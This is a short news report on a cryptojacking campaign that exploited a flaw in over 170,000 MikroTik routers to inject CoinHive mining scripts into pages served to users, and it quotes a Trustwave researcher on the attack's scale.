A massive hacking campaign whipping up a comprehensive list of victimized routers, in their tens of thousands, sees malicious hackers using the network of vulnerable routers to spread their crypto mining malware.
In exploiting a flaw found in over 170,000 routers manufactured by router firm MikroTik, hackers have embedded scripts on the computers of unsuspecting victims to mine cryptocurrencies in a cryptojacking frenzy, TrustWave researcher Simon Kenin wrote in a post today.
While most of the affected devices are located in Brazil, the script has been discovered on other devices operating around the world. “I also noticed other geo-locations being affected as well, so I believe this attack is intended to be on a global scale,” the researcher wrote, adding:
“Let me emphasize how bad this attack is. The attacker wisely thought that instead of infecting small sites with few visitors or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices.”
Since MikroTik manufacture devices used by ISPs, web companies and businesses alike, each device has the means to serve tens if not hundreds of users daily, exposing them all to the crypto mining script.
“We’re … talking about potentially millions of daily pages for the attacker,” Kenin wrote. “The attacker wisely thought that instead of infecting small sites with few visitors or finding sophisticated ways to run malware on end-user computers, they would go straight to the source: carrier-grade router devices.”
Each user would have allegedly initially gotten the CoinHive cryptomining script regardless of the website visited. Even if the attack only worked on pages that returned errors embedded with the script, “we’re still talking about potentially millions of daily pages for the attacker” the researcher added.
An investigation into the campaign has, so far, deduced the developer of the attack as an unknown quantity.
Image credit: Flickr.